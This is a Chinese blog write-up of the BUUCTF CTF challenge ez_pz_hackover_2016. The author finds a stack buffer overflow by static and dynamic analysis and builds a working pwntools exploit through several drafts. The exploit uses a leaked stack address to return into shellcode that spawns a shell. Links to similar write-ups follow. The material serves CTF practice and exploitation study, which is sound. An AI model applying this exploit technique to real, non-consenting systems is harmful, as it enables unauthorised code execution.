[BUUCTF-pwn]——ez_pz_hackover_2016

最新推荐文章于 2025-03-03 16:52:19 发布
原创 最新推荐文章于 2025-03-03 16:52:19 发布 · 452 阅读 · 2 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文介绍了如何解决一个名为'ez_pz_hackover_2016'的CTF挑战,该挑战涉及到栈溢出漏洞的利用。作者通过检查程序保护设置,发现没有开启NX,因此推测需要编写shellcode。在IDA中分析函数后,找到了可以溢出的vuln函数,并通过输入特定字符串触发。经过调试确定了shellcode的地址和返回地址的计算方式,最终构造出exploit并成功交互。

[BUUCTF-pwn]——ez_pz_hackover_2016

checksec一下,NX都没开,十有八九是让自己写shellcode了
在这里插入图片描述
在IDA中,main里面没什么可以看的.
在这里插入图片描述
在chall函数中发现,0x40C = 1036 > 1023无法栈溢出。不过总算找到可以写shellcode 的地方。
在这里插入图片描述
发现vuln函数,只要通过输入"crashme\x00"就可以绕过检查,执行vuln函数。
在这里插入图片描述
并且dest可以栈溢出的因为n 远远大于 0x32。下面就是找到shellcode 的地址,作为返回地址就好了。在pwndbg里面寻找偏移。

我先将exploit大概写出来,如下:

from pwn import *
p=process('./ez_pz_hackover_2016')
gdb.attach(p,'b *0x08048600')
shellcode=asm(shellcraft.sh())
p.recvuntil('crash: ')
s_addr=int(p.recvuntil('\n'),16)
print hex(s_addr)
payload='crashme\x00'.ljust(0x32 + 0x4, '\x00')

payload+= 'this'+shellcode
p.sendline(payload)
p.interactive()

其中,'this’是返回地址,待确定。
在pwndbg中看看
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
修改exploit后为

from pwn import *

p=process('./ez_pz_hackover_2016')
gdb.attach(p,'b *0x08048600')
shellcode=asm(shellcraft.sh())
p.recvuntil('crash: ')

s_addr=int(p.recvuntil('\n'),16)
print hex(s_addr)
payload='crashme\x00'.ljust(0x32 + 0x4, '\x00')

payload+=p32(s_addr)+shellcode
p.sendline(payload)
p.interactive()

结果发现不可以继续调试发现, 返回地址不对。虽然不知道为啥
在这里插入图片描述
但是到ebp的距离是0x16

from pwn import *

p=process('./ez_pz_hackover_2016')
gdb.attach(p,'b *0x08048600')
shellcode=asm(shellcraft.sh())
p.recvuntil('crash: ')

s_addr=int(p.recvuntil('\n'),16)
print hex(s_addr)
payload='crashme\x00'.ljust(0x16 + 0x4 + 0x4, '\x00')

payload+='this'+shellcode
p.sendline(payload)
p.interactive()

在这里插入图片描述
调试确定’this’ 是 p32(s_addr - 0x1c)
所以最终exploit为

exploit

from pwn import *
p=process('./ez_pz_hackover_2016')
shellcode=asm(shellcraft.sh())
p.recvuntil('crash: ')

s_addr=int(p.recvuntil('\n'),16)

payload='crashme\x00'.ljust(0x16 + 0x4, '\x00')
payload+=p32(s_addr-0x1c)+shellcode
p.sendline(payload)
p.interactive()
BUUCTF ez_pz_hackover_2016
m0_73743784的博客
08-28 593
需要注意dest到ebp的距离,使用 IDA Pro 分析时并不一定是正确的,需要配合动态调试才能真正确定利用偏移值可以间接确定写入shellcode。
ctf【ez_pz_hackover_2016
HUANGliang_的博客
10-29 341
ez_pz_hackover_2016
ez_pz_hackover_2016
、moddemod
06-20 643
exp1 #!/usr/bin/env python3 # coding=utf-8 from pwn import * from LibcSearcher import * def debug_pause(): print(proc.pidof(p)) pause() context(log_level='debug') proc_name = './ez_pz_hackover_2016' p = process(proc_name) # p = remote('node3.b.
3S软件
Zzzpiu的博客
12-29 550
地址:https://www.ixxin.cn/software.html 转载地址:https://www.ixxin.cn/software.html
[buu]ez_pz_hackover_2016
Lt95625142的博客
12-23 691
所以这里我们回到的地址应该是在0x0xff8c1e90这个地址上,接下来我们有的地址是0xff8c1eac,怎么表示这个地址呢?这里很可能存在溢出了,这里可以控制我们返回地址的写入(当然这个题在这里打ret2libc也是可以的,但这里libc基地址不太好算(要不传统打法返回两次,这里返回打起来有点点麻烦没shellcode快))(这里其实我们有两个程序栈,一个是chall对应的栈,另一个是vuln对应的程序栈(这个理解成代码需要的内存空间),但这个算出来最后其实不是我们实际要覆盖的返回地址)
BUUCTF pwn ez_pz_hackover_2016(write up)
qq_44768749的博客
08-23 599
BUUCTF pwn ez_pz_hackover_20160x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01 文件分析 没有不可执行栈和段上的读写保护。 0x02 运行 输入name后发现上面还有一个地址。 0x03 IDA 若输入crashme,即可进入vlun函数,主要的漏洞点在这个函数内部的,chall栈的大小很大,足够写 入shellcode,之后的vuln函数会将name的数据复制到vuln的栈上面,而且复制的数据量远远大于栈的 长度,会造
[BUUCTF]PWN——ez_pz_hackover_2016
mcmuyanga的博客
10-08 3150
ez_pz_hackover_2016 题目附件 解题步骤: 例行检查,32位,开启了RELRO保护,二进制的保护机制看这里 由于没有开启nx保护,对于这题一开始想到的是利用写入shellcode来获取shell 试运行一下程序,看到程序一开始给我们了一个地址,随后让我们输入 32位ida载入,首先习惯性的shift+f12检索程序里的字符串,没有看到敏感的函数 从main函数开始看程序 程序主体在chall函数里 一开始给我们输出了参数s的地址,之后利用fgets函数读入1023(0x3ff)长度
BUUCTF Pwn ez_pz_hackover_2016 WP
最新发布
qq_33348179的博客
03-03 343
可以看到 输入字符‘c’的位置应该在0x22 ebp在0x38 0x38-0x22=0x16 再加4字节到返回地址。首先会泄露变量s的地址(栈地址) 然后会对输入进行判断 存在crashme就将输入复制到dest变量。泄露的栈地址和shellcode的地址有0x20的偏移 再加个4位的地址。存在栈溢出 对于strcmp的比较 可以用 \x00 截断。下载 checksec exeinfo。但是dest的偏移不是IDA所写的。32位 IDA32打开 查看函数。
BUUCTF pwn ez_pz_hackover_2016
菜的只能随便写写博客
02-21 2547
0x01 文件分析  没有不可执行栈和段上的读写保护,可以做到很多事情。   0x02 运行  输入name并且回显,上面还有一个地址。   0x03 IDA  主要的漏洞点在这个函数内部的,chall栈的大小很大,足够写入shellcode,之后的vuln函数会将s的数据复制到vuln的栈上面,但是复制的数据量远远大于栈的长度,会造成栈溢出。  并且此函数的栈的地址直接打印出来,不用再去...
[PWN] BUUCTF ez_pz_hackover_2016 1
空城惜梦的博客
06-08 973
[PWN] BUUCTF ez_pz_hackover_2016 1解题分析漏洞利用payload分析输入点与ebp距离的计算方法泄露的地址与shellcode的偏移量payload 解题分析 按照惯例先checksec一下,除了RELRO,其他都没开 执行,观察程序运行逻辑,给出一个地址,然后让我们输入name 32IDA打开程序,观察main函数,header()只是打印图形,chall()才是关键函数 在chall中先输出s的地址,之后fgets接收一个不大于1023(0x3ff)的字符到s的缓
BUUCTF pwn——ez_pz_hackover_2016
CNS-Enterprise BCC-1701-J
04-28 213
BUUCTF 做题练习
Buuctf(pwn) ez_pz_hackover_2016 泄露栈地址,retshellcode;调试计算
半岛铁盒的博客
08-13 1564
32位,开启了RELRO保护,堆栈地址随机化 没有开启nx保护,可利用写入shellcode来获取shell 一开始给我们输出了参数s的地址 strcmp函数: 两个字符串自左向右逐个字符相比(按ASCII值大小相比较),直到出现不同的字符或遇’\0’为止 也就是我们应该输入 ‘crashme\x00’ 可以绕过这个if检查,之后执行vuln函数 dest大小根本不是0x32,要动态调试看大小其实是 0x16 利用思路: 1.往s参数里写入shellcode,执行vuln函数后让dest造成溢出
[PWN] shellcode 2016_ez_pz_hackover
LDX的博客
12-01 508
PEN 栈溢出写入shellcode ez_pz_hackover_2016 BUUCTF刷题
buuctf习题pwn(31~40)
yw__y的博客
09-15 454
BUUCTFPWNez_pz_hackover_2016 | shellcode 动态调试查找参数在栈空间中的偏移
m0_55368674的博客
01-19 547
BUUCTFPWNez_pz_hackover_2016 | shellcode 动态调试查找参数在栈空间中的偏移
buuctf pwn wp(第二波)花哨点的AAAA系列
月阴荒的博客
03-21 516
这里是一个总的分类,一个类型的第一道题目会详细介绍,后面的类型相同的会简略介绍(不过这是第二波,额还是很简单的,原理可以看我前面的文章,后面难一点的题目我再讲原理。) 这一波题都是无脑AAAA的类型,它们的区别主要就是打入多少个填充字符A的区别,(还有接受到什么字符串的区别),反正都是最简单的一类题。 另外声明,脚本有些来自于网络上(太简单的不想多看,太难的不会,除了中间那一档的也没哪些脚本是自己...
memcpy
weixin_45959515的博客
08-26 273
memcpy指的是C和C++使用的内存拷贝函数,函数原型为void *memcpy(void *destin, void *source, unsigned n);函数的功能是从源内存地址的起始位置开始拷贝若干个字节到目标内存地址中,即从源source中拷贝n个字节到目标destin中。 memcpy(c, temp, sizeof(char) * temp_size); ...
BUUCTF刷题之路--ez_pz_hackover_20161
qq_30528603的博客
06-28 520
因此这个函数里是存在栈溢出漏洞的,我们需要执行这个函数。因此我们需要在一开始的输入就构造好我们的shellcode,和shellcode的地址。根据IDA的提示,s数组应该在ebp的上面0x40c个字节处,而dest应该在ebp上面的0x32字节处.但是当我进行输入调试的时候发现ebp在我输入缓冲区的上面。ebp的偏移看到是0x38,我们输入的位置是0x22 ,因为63是c,72是r,0000不是我们输入的。将计就计,既然我们只有一次输入机会,那么我们构造完返回地址后,肯定跟的是我们的shellcode。
pwnez_pz_hackover_2016 --pwngdb和pwntools的结合,动态调试
question55的博客
11-07 362
该函数的作用是将src指向的内存区域中的前n个字节的数据复制到dest指向的内存区域中。由于该函数返回void*类型,通常在使用时需要将其转换为目标类型的指针。memcpy函数是C/C++语言中常用的内存拷贝函数,用于将一块内存中的数据复制到另一块内存中。dest 是目标内存区域的指针,即要将数据复制到的位置。src 是源内存区域的指针,即要从哪里复制数据。n 是要复制的字节数。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值